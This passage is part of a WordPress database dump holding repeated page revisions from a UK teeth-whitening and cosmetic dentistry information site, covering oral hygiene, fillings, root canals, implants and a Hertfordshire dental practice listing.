in the long term tooth loss.</span></p>','Preventive Dentistry','','inherit','closed','closed','','103-revision-v1','','','2018-11-06 12:42:37','2018-11-06 12:42:37','',103,'https://teethwhiteningproduct.co.uk/103-revision-v1',0,'revision','',0),(187,1,'2018-11-06 12:44:54','2018-11-06 12:44:54','<h2>Healthy Smile</h2>\r\nA healthy mouth is important to us, as we all need it to speak, drink, eat, smile and kiss! We all aim to achieve that healthy, appealing smile but many of us are not quite sure how to achieve it. If you look after you teeth and gums, you will be looking after a very important part of your body that helps you look great and feel confident. Here are a few guidelines that we hope you will find useful in creating that healthy, confident smile:\r\n\r\nWe all need to visit our dentist and hygienist regularly to maintain that healthy smile. By visiting MC Dental Practice regularly, your dentist will be able to spot any problems that you may have and any that you may be unaware of that can be detected on radiographs. Your hygienist will be able to help you maintain healthy gums and advise you on ways to improve your cleaning at home.\r\n\r\nIt could be very helpful to research many possible ways in which you could whiten your quickly and effectively\r\n\r\n<a href=\"https://medlanddental.com.au/teeth-whitening/\" target=\"_blank\" rel=\"noopener\">Expert Teeth Whitening Services</a> such as The Zoom WhiteSpeed system is one of the quickest and most convenient way to immediately achieve fantastic teeth whitening result.\r\n\r\n<img class=\"alignleft wp-image-181 \" src=\"https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/11/teeth-1652937_960_720.jpg\" alt=\"\" width=\"649\" height=\"471\" />\r\n\r\nOur highly trained staff are happy to discuss any anxieties you may have or offer advice on treatments available.\r\n\r\nWe offer a preventative dental care program which is payable monthly, thus taking the worry out of facing large\r\ndental bills.\r\n\r\n<strong>A wide range of treatments are available which include.</strong>\r\n\r\n<strong>► Cosmetic dentistry</strong>\r\n<a href=\"http://welovewhiteteeth.co.uk/procedure/teeth-whitening-aftercare\" target=\"_blank\" rel=\"noopener\"><strong> ► Teeth Whitening</strong></a>\r\n<strong> ► Orthodontic</strong>\r\n<strong> ► Dental Implants</strong>\r\n<strong> ► Crown and Bridges</strong>\r\n<strong> ► Prosthetic</strong>\r\n<strong> ► Periodontics</strong>\r\n<strong> ► Endodontics</strong>','Keeping a Healthy Smile','','inherit','closed','closed','','98-revision-v1','','','2018-11-06 12:44:54','2018-11-06 12:44:54','',98,'https://teethwhiteningproduct.co.uk/98-revision-v1',0,'revision','',0),(188,1,'2018-11-06 13:24:29','2018-11-06 13:24:29','<h2>Healthy Smile</h2>\r\nA healthy mouth is important to us, as we all need it to speak, drink, eat, smile and kiss! We all aim to achieve that healthy, appealing smile but many of us are not quite sure how to achieve it. If you look after you teeth and gums, you will be looking after a very important part of your body that helps you look great and feel confident. Here are a few guidelines that we hope you will find useful in creating that healthy, confident smile:\r\n\r\nWe all need to visit our dentist and hygienist regularly to maintain that healthy smile. By visiting MC Dental Practice regularly, your dentist will be able to spot any problems that you may have and any that you may be unaware of that can be detected on radiographs. Your hygienist will be able to help you maintain healthy gums and advise you on ways to improve your cleaning at home.\r\n\r\nIt could be very helpful to research many possible ways in which you could whiten your quickly and effectively\r\n\r\n<a href=\"https://medlanddental.com.au/teeth-whitening/\" target=\"_blank\" rel=\"noopener\">Expert Teeth Whitening Services</a> such as The Zoom WhiteSpeed system is one of the quickest and most convenient way to immediately achieve fantastic teeth whitening result.\r\n\r\n<img class=\"alignleft wp-image-181 \" src=\"https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/11/teeth-1652937_960_720.jpg\" alt=\"\" width=\"649\" height=\"471\" />\r\n\r\nOur highly trained staff are happy to discuss any anxieties you may have or offer advice on treatments available.\r\n\r\nWe offer a preventative dental care program which is payable monthly, thus taking the worry out of facing large\r\ndental bills.\r\n\r\n<strong>A wide range of treatments are available which include.</strong>\r\n\r\n<strong>► Cosmetic dentistry</strong>\r\n<a href=\"http://welovewhiteteeth.co.uk/procedure/teeth-whitening-aftercare\" target=\"_blank\" rel=\"noopener\"><strong> ► Teeth Whitening</strong></a>\r\n<strong> ► Orthodontic</strong>\r\n<a href=\"http://themewsdentalstudio.co.uk/cosmetic-dentistry/benefits-dental-implants\" target=\"_blank\" rel=\"noopener\"><strong> ► Dental Implants</strong></a>\r\n<strong> ► Crown and Bridges</strong>\r\n<strong> ► Prosthetic</strong>\r\n<strong> ► Periodontics</strong>\r\n<strong> ► Endodontics</strong>','Keeping a Healthy Smile','','inherit','closed','closed','','98-revision-v1','','','2018-11-06 13:24:29','2018-11-06 13:24:29','',98,'https://teethwhiteningproduct.co.uk/98-revision-v1',0,'revision','',0),(190,1,'2019-02-18 16:18:00','2019-02-18 16:18:00','','Beauty Woman Portrait. Girl With Beautiful Face Smiling','','inherit','closed','closed','','beauty-woman-portrait-girl-with-beautiful-face-smiling','','','2019-02-18 16:18:19','2019-02-18 16:18:19','',5,'https://teethwhiteningproduct.co.uk/wp-content/uploads/2019/02/iStock-936967024.jpg',0,'attachment','image/jpeg',0),(191,1,'2019-02-18 16:18:30','2019-02-18 16:18:30','<h2><a href=\"/\"><img class=\"alignnone size-full wp-image-190\" src=\"https://teethwhiteningproduct.co.uk/wp-content/uploads/2019/02/iStock-936967024.jpg\" alt=\"What are your teeth whitening options?\" width=\"1254\" height=\"836\" /></a></h2>\r\n<h2>London & Hertfordshire dentists offer the highest quality dental treatments and facial aesthetics</h2>\r\nYour dentist should be skilled and experienced doctors knowledgeable in the latest dental procedures.\r\n\r\nTreatments typically offered include teeth whitening, porcelain veneers, lumineers, crowns and bridges, dental implants, Invisalign and orthodontic procedures.\r\n\r\n<em><strong>Teeth Whitening Products\' aim is dental health for you and your family.</strong></em>\r\n<blockquote><a href=\"https://teethwhiteningproduct.co.uk/contact-us/\">Contact us for more information</a>.</blockquote>\r\n<h2>Get a Beautiful Smile with Beautiful Teeth</h2>\r\nThis means giving you regular dental advice and screening and helping you to understand how to care for your own mouth.\r\n\r\nOur aim is to provide good quality dentistry using the latest technology and materials available, but also to offer relaxed and friendly surroundings and minimum discomfort.\r\n\r\nThe team operates a preventive approach and our goal is to make your mouth comfortable and efficient with the best aesthetic result that is practicable.\r\n\r\nYour local practice should offer a full range of dental treatments, including general density, and other specialised treatments such as:\r\n<ul>\r\n <li>Restorative (crown and bridges)</li>\r\n <li>Cosmetic (including veneers & tooth whitening)</li>\r\n <li>Preventative (orthodontic)</li>\r\n</ul>\r\n<h2><a href=\"https://www.hockerilldental.com/our-practice\" target=\"_blank\" rel=\"noopener\">Leading cosmetic dentists in Hertfordshire</a></h2>\r\nHockerill Dental is based in Bishops\' Stortford and has been operating since 1960. They provide all standard dental treatments, as well as offering cosmetic dentistry such as porcelain veneers.\r\n\r\nAs well as this, they accept NHS and private patients and offer a nervous patient treatment for those who are anxious.\r\n\r\nDon\'t worry about visiting the dentist, as the Hockerill Dental team can help you overcome this fear, whilst ensuring your oral health is at its best. Call <a href=\"tel:01279652400\">01279 652400</a> for more information.\r\n<blockquote><a href=\"https://teethwhiteningproduct.co.uk/dentists/\">Click here to see a list of other dentists</a>.</blockquote>','Teeth Whitening','','inherit','closed','closed','','5-revision-v1','','','2019-02-18 16:18:30','2019-02-18 16:18:30','',5,'https://teethwhiteningproduct.co.uk/5-revision-v1',0,'revision','',0),(192,1,'2019-02-18 16:19:04','2019-02-18 16:19:04','<h2><a href=\"/\"><img class=\"alignnone size-full wp-image-190\" src=\"https://teethwhiteningproduct.co.uk/wp-content/uploads/2019/02/iStock-936967024.jpg\" alt=\"What are your teeth whitening options?\" width=\"1254\" height=\"836\" /></a></h2>\r\n<h2>London & Hertfordshire dentists offer the highest quality dental treatments and facial aesthetics</h2>\r\nYour dentist should be skilled and experienced doctors knowledgeable in the latest dental procedures.\r\n\r\nTreatments typically offered include teeth whitening, porcelain veneers, lumineers, crowns and bridges, dental implants, Invisalign and orthodontic procedures.\r\n\r\n<em><strong>Teeth Whitening Products\' aim is dental health for you and your family.</strong></em>\r\n<blockquote><a href=\"https://teethwhiteningproduct.co.uk/contact-us/\">Contact us for more information</a>.</blockquote>\r\n<h2>Get a Beautiful Smile with Beautiful Teeth</h2>\r\nThis means giving you regular dental advice and screening and helping you to understand how to care for your own mouth.\r\n\r\nOur aim is to provide good quality dentistry using the latest technology and materials available, but also to offer relaxed and friendly surroundings and minimum discomfort.\r\n\r\nThe team operates a preventive approach and our goal is to make your mouth comfortable and efficient with the best aesthetic result that is practicable.\r\n\r\nYour local practice should offer a full range of dental treatments, including general density, and other specialised treatments such as:\r\n<ul>\r\n <li>Restorative (crown and bridges)</li>\r\n <li>Cosmetic (including veneers & tooth whitening)</li>\r\n <li>Preventative (orthodontic)</li>\r\n</ul>\r\n<h2><a href=\"https://www.hockerilldental.com/our-practice\" target=\"_blank\" rel=\"noopener\">Leading cosmetic dentists in Hertfordshire</a></h2>\r\nHockerill Dental is based in Bishops\' Stortford and has been operating since 1960. They provide all standard dental treatments, as well as offering cosmetic dentistry such as porcelain veneers.\r\n\r\nAs well as this, they accept NHS and private patients and offer a nervous patient treatment for those who are anxious.\r\n\r\nDon\'t worry about visiting the dentist, as the Hockerill Dental team can help you overcome this fear, whilst ensuring your oral health is at its best. Call <a href=\"tel:01279652400\">01279 652400</a> for more information.\r\n<blockquote><a href=\"https://teethwhiteningproduct.co.uk/dentists/\">Click here to see a list of other dentists</a>.</blockquote>','Feel confident with your smile with teeth whitening','','inherit','closed','closed','','5-revision-v1','','','2019-02-18 16:19:04','2019-02-18 16:19:04','',5,'https://teethwhiteningproduct.co.uk/5-revision-v1',0,'revision','',0),(193,1,'2019-02-18 16:19:47','2019-02-18 16:19:47','<h2><a href=\"/\"><img class=\"alignnone size-full wp-image-190\" src=\"https://teethwhiteningproduct.co.uk/wp-content/uploads/2019/02/iStock-936967024.jpg\" alt=\"What are your teeth whitening options?\" width=\"1254\" height=\"836\" /></a></h2>\r\n<h2>London & Hertfordshire dentists offer the highest quality dental treatments and facial aesthetics</h2>\r\nYour dentist should be skilled and experienced doctors knowledgeable in the latest dental procedures.\r\n\r\nTreatments typically offered include teeth whitening, porcelain veneers, lumineers, crowns and bridges, dental implants, Invisalign and orthodontic procedures.\r\n\r\n<em><strong>Teeth Whitening Products\' aim is dental health for you and your family.</strong></em>\r\n<blockquote><a href=\"https://teethwhiteningproduct.co.uk/contact-us/\">Contact us for more information</a>.</blockquote>\r\n<h2>Get a Beautiful Smile with Beautiful Teeth</h2>\r\nThis means giving you regular dental advice and screening and helping you to understand how to care for your own mouth.\r\n\r\nOur aim is to provide good quality dentistry using the latest technology and materials available, but also to offer relaxed and friendly surroundings and minimum discomfort.\r\n\r\nThe team operates a preventive approach and our goal is to make your mouth comfortable and efficient with the best aesthetic result that is practicable.\r\n\r\nYour local practice should offer a full range of dental treatments, including general density, and other specialised treatments such as:\r\n<ul>\r\n <li>Restorative (crown and bridges)</li>\r\n <li>Cosmetic (including veneers & tooth whitening)</li>\r\n <li>Preventative (orthodontic)</li>\r\n</ul>\r\n<h2><a href=\"https://www.hockerilldental.com/our-practice\" target=\"_blank\" rel=\"noopener\">Leading cosmetic dentists in Hertfordshire</a></h2>\r\nHockerill Dental is based in Bishops\' Stortford and has been operating since 1960. They provide all standard dental treatments, as well as offering cosmetic dentistry such as porcelain veneers.\r\n\r\nAs well as this, they accept NHS and private patients and offer a nervous patient treatment for those who are anxious.\r\n\r\nDon\'t worry about visiting the dentist, as the Hockerill Dental team can help you overcome this fear, whilst ensuring your oral health is at its best. Call <a href=\"tel:01279652400\">01279 652400</a> for more information.\r\n<blockquote><a href=\"https://teethwhiteningproduct.co.uk/dentists/\">Click here to see a list of other dentists</a>.</blockquote>','Feel confident with your smile teeth whitening treatments','','inherit','closed','closed','','5-revision-v1','','','2019-02-18 16:19:47','2019-02-18 16:19:47','',5,'https://teethwhiteningproduct.co.uk/5-revision-v1',0,'revision','',0),(194,1,'2019-02-18 16:20:00','2019-02-18 16:20:00','<h2><a href=\"/\"><img class=\"alignnone size-full wp-image-190\" src=\"https://teethwhiteningproduct.co.uk/wp-content/uploads/2019/02/iStock-936967024.jpg\" alt=\"What are your teeth whitening options?\" width=\"1254\" height=\"836\" /></a></h2>\r\n<h2>London & Hertfordshire dentists offer the highest quality dental treatments and facial aesthetics</h2>\r\nYour dentist should be skilled and experienced doctors knowledgeable in the latest dental procedures.\r\n\r\nTreatments typically offered include teeth whitening, porcelain veneers, lumineers, crowns and bridges, dental implants, Invisalign and orthodontic procedures.\r\n\r\n<em><strong>Teeth Whitening Products\' aim is dental health for you and your family.</strong></em>\r\n<blockquote><a href=\"https://teethwhiteningproduct.co.uk/contact-us/\">Contact us for more information</a>.</blockquote>\r\n<h2>Get a Beautiful Smile with Beautiful Teeth</h2>\r\nThis means giving you regular dental advice and screening and helping you to understand how to care for your own mouth.\r\n\r\nOur aim is to provide good quality dentistry using the latest technology and materials available, but also to offer relaxed and friendly surroundings and minimum discomfort.\r\n\r\nThe team operates a preventive approach and our goal is to make your mouth comfortable and efficient with the best aesthetic result that is practicable.\r\n\r\nYour local practice should offer a full range of dental treatments, including general density, and other specialised treatments such as:\r\n<ul>\r\n <li>Restorative (crown and bridges)</li>\r\n <li>Cosmetic (including veneers & tooth whitening)</li>\r\n <li>Preventative (orthodontic)</li>\r\n</ul>\r\n<h2><a href=\"https://www.hockerilldental.com/our-practice\" target=\"_blank\" rel=\"noopener\">Leading cosmetic dentists in Hertfordshire</a></h2>\r\nHockerill Dental is based in Bishops\' Stortford and has been operating since 1960. They provide all standard dental treatments, as well as offering cosmetic dentistry such as porcelain veneers.\r\n\r\nAs well as this, they accept NHS and private patients and offer a nervous patient treatment for those who are anxious.\r\n\r\nDon\'t worry about visiting the dentist, as the Hockerill Dental team can help you overcome this fear, whilst ensuring your oral health is at its best. Call <a href=\"tel:01279652400\">01279 652400</a> for more information.\r\n<blockquote><a href=\"https://teethwhiteningproduct.co.uk/dentists/\">Click here to see a list of other dentists</a>.</blockquote>','Feel confident with your smile using teeth whitening treatments','','inherit','closed','closed','','5-revision-v1','','','2019-02-18 16:20:00','2019-02-18 16:20:00','',5,'https://teethwhiteningproduct.co.uk/5-revision-v1',0,'revision','',0),(196,1,'2019-05-08 12:54:29','2019-05-08 12:54:29','Teethwhiteningproduct.co.uk is an informational web site where patients can understand about cosmetic dental processes and find a local dentist. The data contained within this web page ought to not be taken like a substitute for professional medical guidance, which you must find from your dentist or orthodontist.\r\n<h2>What is cosmetic dentistry?</h2>\r\nLocal dentists have caused a new revolution within the field of dentistry. The fact that it helps in enhancing the face value is undeniable. But the question is, “Is it truly inexpensive?” Even if much dental insurance are out there, they don’t cover your whole expense. Many dental practices now <a href=\"https://www.nature.com/articles/sj.bdj.2016.388\" target=\"_blank\" rel=\"noopener\">offer finance</a>.\r\n\r\nAt numerous times, we are put in a situation exactly where we have to spend out of our own pocket. So what is usually done to get it carried out at the price you possibly can afford?\r\n<h2>What is cosmetic dentistry?</h2>\r\n<blockquote><em>Cosmetic dentistry involves dental processes with the aim of improving the overall aesthetics of your smile.</em></blockquote>\r\nThis is frequently referred to like a “smile makeover”, “Hollywood smile” or “Wedding smile”. A beautiful smile can have numerous effects on an individual’s self-confidence, self-esteem and personal relationships.\r\n\r\nThe recent boost in the Medias focus on the smile, with TV shows including <a href=\"https://en.wikipedia.org/wiki/Extreme_Makeover\" target=\"_blank\" rel=\"noopener\">Extreme Makeover</a>, has created a public awareness about cosmetic dentistry and its accessibility.\r\n\r\n<strong>Patients tend to go for an assortment of reasons</strong>. Some go for it just for the sake of looking younger, as it gives a dental facelift, while others go for it to <a href=\"https://myobrace.com/en-gb/what-causes-crooked-teeth\" target=\"_blank\" rel=\"noopener\">correct their crooked</a>, overlapping, damaged or <a href=\"https://www.eliteorthodontics.co.uk/dental-problems/crowded-teeth\" target=\"_blank\" rel=\"noopener\">crowded teeth</a>.\r\n\r\nModern dentistry provides a broad assortment of remedy to folks to suit their requirements. Sometimes they’re combined and custom produced to makeover several concerns. <a href=\"https://www.colgate.com/en-us/oral-health/life-stages/adult-oral-care/five-types-of-cosmetic-dentistry-procedures-0415\" target=\"_blank\" rel=\"noopener\">View more information</a>.\r\n<h2>Materials</h2>\r\nIn the olden days, metals like gold or silver were utilised for filling. But now in modern days porcelain or composite is used to give cosmetic value as they closely resemble the natural teeth. <a href=\"https://www.sharecare.com/health/dental-fillings/advantages-composite-tooth-fillings\" target=\"_blank\" rel=\"noopener\">What are the benefits?</a>\r\n<h2>Treatment Alternatives</h2>\r\nYou can find a wide assortment of possibilities accessible. These alternatives consist of teeth whitening, porcelain veneers, contouring or teeth reshaping, dental implantations, cosmetic braces, enamel reshaping, gum lifting, etc.\r\n\r\nWith so many options available, you’re able to probably think of visiting your dentist for one from the treatments or a combination of them to suit your needs and improve your dental health and aesthetics.','We are Cosmetic Dentists','','publish','closed','closed','','we-are-cosmetic-dentists','','','2019-05-08 12:54:29','2019-05-08 12:54:29','',0,'https://teethwhiteningproduct.co.uk/?p=196',0,'post','',0),(197,1,'2019-05-08 12:54:23','2019-05-08 12:54:23','','cosmetic-dental-treatments','','inherit','closed','closed','','cosmetic-dental-treatments','','','2019-05-08 12:54:23','2019-05-08 12:54:23','',196,'https://teethwhiteningproduct.co.uk/wp-content/uploads/2019/05/cosmetic-dental-treatments.jpg',0,'attachment','image/jpeg',0),(198,1,'2019-05-08 12:54:29','2019-05-08 12:54:29','Teethwhiteningproduct.co.uk is an informational web site where patients can understand about cosmetic dental processes and find a local dentist. The data contained within this web page ought to not be taken like a substitute for professional medical guidance, which you must find from your dentist or orthodontist.\r\n<h2>What is cosmetic dentistry?</h2>\r\nLocal dentists have caused a new revolution within the field of dentistry. The fact that it helps in enhancing the face value is undeniable. But the question is, “Is it truly inexpensive?” Even if much dental insurance are out there, they don’t cover your whole expense. Many dental practices now <a href=\"https://www.nature.com/articles/sj.bdj.2016.388\" target=\"_blank\" rel=\"noopener\">offer finance</a>.\r\n\r\nAt numerous times, we are put in a situation exactly where we have to spend out of our own pocket. So what is usually done to get it carried out at the price you possibly can afford?\r\n<h2>What is cosmetic dentistry?</h2>\r\n<blockquote><em>Cosmetic dentistry involves dental processes with the aim of improving the overall aesthetics of your smile.</em></blockquote>\r\nThis is frequently referred to like a “smile makeover”, “Hollywood smile” or “Wedding smile”. A beautiful smile can have numerous effects on an individual’s self-confidence, self-esteem and personal relationships.\r\n\r\nThe recent boost in the Medias focus on the smile, with TV shows including <a href=\"https://en.wikipedia.org/wiki/Extreme_Makeover\" target=\"_blank\" rel=\"noopener\">Extreme Makeover</a>, has created a public awareness about cosmetic dentistry and its accessibility.\r\n\r\n<strong>Patients tend to go for an assortment of reasons</strong>. Some go for it just for the sake of looking younger, as it gives a dental facelift, while others go for it to <a href=\"https://myobrace.com/en-gb/what-causes-crooked-teeth\" target=\"_blank\" rel=\"noopener\">correct their crooked</a>, overlapping, damaged or <a href=\"https://www.eliteorthodontics.co.uk/dental-problems/crowded-teeth\" target=\"_blank\" rel=\"noopener\">crowded teeth</a>.\r\n\r\nModern dentistry provides a broad assortment of remedy to folks to suit their requirements. Sometimes they’re combined and custom produced to makeover several concerns. <a href=\"https://www.colgate.com/en-us/oral-health/life-stages/adult-oral-care/five-types-of-cosmetic-dentistry-procedures-0415\" target=\"_blank\" rel=\"noopener\">View more information</a>.\r\n<h2>Materials</h2>\r\nIn the olden days, metals like gold or silver were utilised for filling. But now in modern days porcelain or composite is used to give cosmetic value as they closely resemble the natural teeth. <a href=\"https://www.sharecare.com/health/dental-fillings/advantages-composite-tooth-fillings\" target=\"_blank\" rel=\"noopener\">What are the benefits?</a>\r\n<h2>Treatment Alternatives</h2>\r\nYou can find a wide assortment of possibilities accessible. These alternatives consist of teeth whitening, porcelain veneers, contouring or teeth reshaping, dental implantations, cosmetic braces, enamel reshaping, gum lifting, etc.\r\n\r\nWith so many options available, you’re able to probably think of visiting your dentist for one from the treatments or a combination of them to suit your needs and improve your dental health and aesthetics.','We are Cosmetic Dentists','','inherit','closed','closed','','196-revision-v1','','','2019-05-08 12:54:29','2019-05-08 12:54:29','',196,'https://teethwhiteningproduct.co.uk/196-revision-v1',0,'revision','',0),(199,1,'2019-05-08 12:55:48','2019-05-08 12:55:48','','Cosmetic Dentists','','publish','closed','closed','','cosmetic-dentists','','','2021-05-28 10:31:57','2021-05-28 10:31:57','',0,'https://teethwhiteningproduct.co.uk/?p=199',11,'nav_menu_item','',0),(201,1,'2019-12-04 16:13:10','2019-12-04 16:13:10','<h2><a href=\"https://teethwhiteningproduct.co.uk/book-a-teeth-whitening-session%e2%80%8e\">Oral Hygiene Services</a></h2>\r\n<blockquote>Gum disease is fairly common and ranges from mild inflammation (gingivitis) to severe disease (periodontitis) which, if neglected, can lead to root disease or loss of teeth.</blockquote>\r\nPrevention is the most important way to combat gum disease and periodontitis, through maintaining a programme of oral hygiene. In addition to regular brushing and flossing of teeth and avoidance of risk factors, a regular program of care by your Dental Hygienist is of paramount importance.\r\n\r\nWe are fortunate to have the services of a team of skilled and highly trained Hygienists at Westbrook House who are dedicated to maintaining the oral and periodontal health of our patients, with gentle and caring cleaning and invaluable advice on how to maintain a healthy mouth, for adults as well as children.\r\n<h3>Fillings, Inlays and Onlays</h3>\r\nWe offer silver amalgam fillings and white composite fillings.\r\n<blockquote>The composite fillings have the advantage of being close to the normal colour of the tooth.</blockquote>\r\nOur dentists use the most advanced materials and techniques to obtain a durable and pleasing result.\r\n\r\n<img class=\"size-full wp-image-146 alignleft\" src=\"https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/09/doctor-1149149_960_720.jpg\" alt=\"\" width=\"15%\" height=\"640\" />In certain situations, an inlay or an onlay is used as an alternative to simple fillings. They are stronger and can last longer than fillings, and are especially suitable for the chewing surfaces of back teeth and large repairs to front teeth. Onlays and inlays can be made of metal, composite or porcelain. An inlay fills a hole in the tooth while an onlay sits on the tooth to builds up its shape or bridge a gap between teeth.\r\n<h3>Root Canal Treatment (Endodontics)</h3>\r\n<blockquote>In some cases, a cavity in a tooth becomes very big and reaches the nerve in the root of the tooth.</blockquote>\r\nThe root canals, which contain the nerve and blood vessels that supply the tooth, can become infected. Treatment is usually carried out over two or more stages. The purpose of the treatment is to first clear the infection then to remove dead tissue from inside the tooth and to clean and disinfect the root canals.\r\n\r\nOnce clean, the canals are filled to seal them off from re-infection.\r\n\r\nThe procedure is usually done under local anaesthesia.\r\n<h3>Dental Implants</h3>\r\nWhen gum disease gets more serious and turns into periodontal disease the teeth will begin to come to lose in your mouth and can eventually fall out. If you\'ve lost teeth to gum disease you may want to consider dental implants as a much better alternative to dentures. They can improve the overall look of your smile and can even be fitted in just one appointment. <a href=\"https://dorsetdentalimplants.com/dental-implants/teeth-in-a-day-all-on-4\" target=\"_blank\" rel=\"noopener\">See more</a>.','General Dentistry Services','','publish','closed','closed','','general-dentistry-services','','','2019-12-04 16:14:59','2019-12-04 16:14:59','',151,'https://teethwhiteningproduct.co.uk/?page_id=201',0,'page','',0),(202,1,'2019-12-04 16:13:10','2019-12-04 16:13:10',' ','','','publish','closed','closed','','202','','','2021-05-28 10:31:57','2021-05-28 10:31:57','',151,'https://teethwhiteningproduct.co.uk/202',18,'nav_menu_item','',0),(203,1,'2019-12-04 16:13:10','2019-12-04 16:13:10','<h2><a href=\"https://teethwhiteningproduct.co.uk/book-a-teeth-whitening-session%e2%80%8e\">Oral Hygiene Services</a></h2>\r\nGum disease is fairly common, and ranges from mild inflammation (gingivitis) to severe disease (periodontitis) which, if neglected, can lead to root disease or loss of teeth>\r\n\r\nPrevention is the most important way to combat gum disease and periodontitis, through maintaining a programme of oral hygiene. In addition to regular brushing and flossing of teeth and avoidance of risk factors, a regular program of care by your Dental Hygienist is of paramount importance.\r\n\r\nWe are fortunate to have the services of a team of skilled and highly trained Hygienists at Westbrook House who are dedicated to maintaining the oral and periodontal health of our patients, with gentle and caring cleaning and invaluable advice on how to maintain a healthy mouth, for adults as well as children.\r\n<h3>Fillings, Inlays and Onlays</h3>\r\nWe offer silver amalgam fillings and white composite fillings.\r\n\r\nThe composite fillings have the advantage of being close to the normal colour of the tooth.\r\n\r\nOur dentists use the most advanced materials and techniques to obtain a durable and pleasing result.\r\n\r\nIn certain situations, an inlay or an onlay is used as an alternative to simple fillings. They are stronger and can last longer than fillings, and are especially suitable for the chewing surfaces of back teeth and large repairs to front teeth. Onlays and inlays can be made of metal, composite or porcelain. An inlay fills a hole in the tooth while an onlay sits on the tooth to builds up its shape or bridge a gap between teeth.\r\n<h3>Root Canal Treatment (Endodontics)</h3>\r\nIn some cases, a cavity in a tooth becomes very big and reaches the nerve in the root of the tooth. The root canals, which contain the nerve and blood vessels that supply the tooth, can become infected. Treatment is usually carried out over two or more stages. The purpose of the treatment is to first clear the infection then to remove dead tissue from inside the tooth and to clean and disinfect the root canals. Once clean, the canals are filled to seal them off from re-infection.\r\n\r\nThe procedure is usually done under local anaesthesia.\r\n<h3>Dental Implants</h3>\r\nWhen gum disease gets more serious and turns into periodontal disease the teeth will begin to come to lose in your mouth and can eventually fall out. If you\'ve lost teeth to gum disease you may want to consider dental implants as a much better alternative to dentures. They can improve the overall look of your smile and can even be fitted in just one appointment. <a href=\"https://dorsetdentalimplants.com/dental-implants/teeth-in-a-day-all-on-4\" target=\"_blank\" rel=\"noopener\">See more</a>.','General Dentistry Services','','inherit','closed','closed','','201-revision-v1','','','2019-12-04 16:13:10','2019-12-04 16:13:10','',201,'https://teethwhiteningproduct.co.uk/201-revision-v1',0,'revision','',0),(204,1,'2019-12-04 16:14:22','2019-12-04 16:14:22','<h2><a href=\"https://teethwhiteningproduct.co.uk/book-a-teeth-whitening-session%e2%80%8e\">Oral Hygiene Services</a></h2>\n<blockquote>Gum disease is fairly common and ranges from mild inflammation (gingivitis) to severe disease (periodontitis) which, if neglected, can lead to root disease or loss of teeth.</blockquote>\nPrevention is the most important way to combat gum disease and periodontitis, through maintaining a programme of oral hygiene. In addition to regular brushing and flossing of teeth and avoidance of risk factors, a regular program of care by your Dental Hygienist is of paramount importance.\n\nWe are fortunate to have the services of a team of skilled and highly trained Hygienists at Westbrook House who are dedicated to maintaining the oral and periodontal health of our patients, with gentle and caring cleaning and invaluable advice on how to maintain a healthy mouth, for adults as well as children.\n<h3>Fillings, Inlays and Onlays</h3>\nWe offer silver amalgam fillings and white composite fillings.\n<blockquote>The composite fillings have the advantage of being close to the normal colour of the tooth.</blockquote>\nOur dentists use the most advanced materials and techniques to obtain a durable and pleasing result.\n\nIn certain situations, an inlay or an onlay is used as an alternative to simple fillings. They are stronger and can last longer than fillings, and are especially suitable for the chewing surfaces of back teeth and large repairs to front teeth. Onlays and inlays can be made of metal, composite or porcelain. An inlay fills a hole in the tooth while an onlay sits on the tooth to builds up its shape or bridge a gap between teeth.\n<h3>Root Canal Treatment (Endodontics)</h3>\n<blockquote>In some cases, a cavity in a tooth becomes very big and reaches the nerve in the root of the tooth.</blockquote>\nThe root canals, which contain the nerve and blood vessels that supply the tooth, can become infected. Treatment is usually carried out over two or more stages. The purpose of the treatment is to first clear the infection then to remove dead tissue from inside the tooth and to clean and disinfect the root canals.\n\nOnce clean, the canals are filled to seal them off from re-infection.\n\nThe procedure is usually done under local anaesthesia.\n<h3>Dental Implants</h3>\nWhen gum disease gets more serious and turns into periodontal disease the teeth will begin to come to lose in your mouth and can eventually fall out. If you\'ve lost teeth to gum disease you may want to consider dental implants as a much better alternative to dentures. They can improve the overall look of your smile and can even be fitted in just one appointment. <a href=\"https://dorsetdentalimplants.com/dental-implants/teeth-in-a-day-all-on-4\" target=\"_blank\" rel=\"noopener\">See more</a>.','General Dentistry Services','','inherit','closed','closed','','201-autosave-v1','','','2019-12-04 16:14:22','2019-12-04 16:14:22','',201,'https://teethwhiteningproduct.co.uk/201-autosave-v1',0,'revision','',0),(205,1,'2019-12-04 16:14:59','2019-12-04 16:14:59','<h2><a href=\"https://teethwhiteningproduct.co.uk/book-a-teeth-whitening-session%e2%80%8e\">Oral Hygiene Services</a></h2>\r\n<blockquote>Gum disease is fairly common and ranges from mild inflammation (gingivitis) to severe disease (periodontitis) which, if neglected, can lead to root disease or loss of teeth.</blockquote>\r\nPrevention is the most important way to combat gum disease and periodontitis, through maintaining a programme of oral hygiene. In addition to regular brushing and flossing of teeth and avoidance of risk factors, a regular program of care by your Dental Hygienist is of paramount importance.\r\n\r\nWe are fortunate to have the services of a team of skilled and highly trained Hygienists at Westbrook House who are dedicated to maintaining the oral and periodontal health of our patients, with gentle and caring cleaning and invaluable advice on how to maintain a healthy mouth, for adults as well as children.\r\n<h3>Fillings, Inlays and Onlays</h3>\r\nWe offer silver amalgam fillings and white composite fillings.\r\n<blockquote>The composite fillings have the advantage of being close to the normal colour of the tooth.</blockquote>\r\nOur dentists use the most advanced materials and techniques to obtain a durable and pleasing result.\r\n\r\n<img class=\"size-full wp-image-146 alignleft\" src=\"https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/09/doctor-1149149_960_720.jpg\" alt=\"\" width=\"15%\" height=\"640\" />In certain situations, an inlay or an onlay is used as an alternative to simple fillings. They are stronger and can last longer than fillings, and are especially suitable for the chewing surfaces of back teeth and large repairs to front teeth. Onlays and inlays can be made of metal, composite or porcelain. An inlay fills a hole in the tooth while an onlay sits on the tooth to builds up its shape or bridge a gap between teeth.\r\n<h3>Root Canal Treatment (Endodontics)</h3>\r\n<blockquote>In some cases, a cavity in a tooth becomes very big and reaches the nerve in the root of the tooth.</blockquote>\r\nThe root canals, which contain the nerve and blood vessels that supply the tooth, can become infected. Treatment is usually carried out over two or more stages. The purpose of the treatment is to first clear the infection then to remove dead tissue from inside the tooth and to clean and disinfect the root canals.\r\n\r\nOnce clean, the canals are filled to seal them off from re-infection.\r\n\r\nThe procedure is usually done under local anaesthesia.\r\n<h3>Dental Implants</h3>\r\nWhen gum disease gets more serious and turns into periodontal disease the teeth will begin to come to lose in your mouth and can 